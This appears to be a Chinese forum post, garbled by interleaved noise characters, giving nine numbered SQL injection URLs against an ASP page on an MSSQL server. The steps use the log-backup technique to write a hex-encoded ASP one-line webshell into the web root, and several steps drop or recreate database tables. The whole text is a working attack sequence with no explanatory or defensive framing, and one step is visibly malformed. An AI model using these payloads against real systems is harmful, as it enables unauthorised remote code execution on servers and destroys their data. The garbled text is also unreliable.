第一步
0 w8 `2 ~6 v+ S6 `http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--/ ?4 w2 n) [* z# V' O' d* X
' s7 I1 k& E' ^, t4 U
第二步:1 X0 i2 D/ i+ G" r S0 ~5 [
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--( i/ |( a* l& C% r( p
0 a9 c# C: }) x( Y8 i: z5 {第三步
& n# V* M' q3 P3 H6 A. N' Yhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
7 x3 f( B5 y( e# I1 \; W3 @7 O4 K, [/ O/ r5 L0 U
第四步
9 m1 V$ J; ]+ Thttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--/ n' [* [: q& D
$ p% z. }( @; a/ B第五步! B' E4 J7 E: ^
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--; {2 H0 ^: z6 U+ r5 F, G
4 ]) G9 K- ~. t
第六步2 B+ R. ^8 z. R4 G; b& R
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--8 r. Z8 k, C& V' p( e1 W, X0 ~
% F; V2 s( c& v4 r第七步
7 j2 B m( r- {7 O& x; n/ U; o0 k3 }http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
9 A" m: a- j% {* b" ]7 U% h
- {; i2 n7 X; d9 H: q/ N2 R! C2 [第八步' i5 R) ~+ E. {8 q) F6 [
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
9 n# k, b4 ~" h% H- s2 r( g
. J6 z! m& A! L1 l$ C4 W第九步
; s9 T8 [) \0 khttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 x ~) |: E) E4 p4 Q |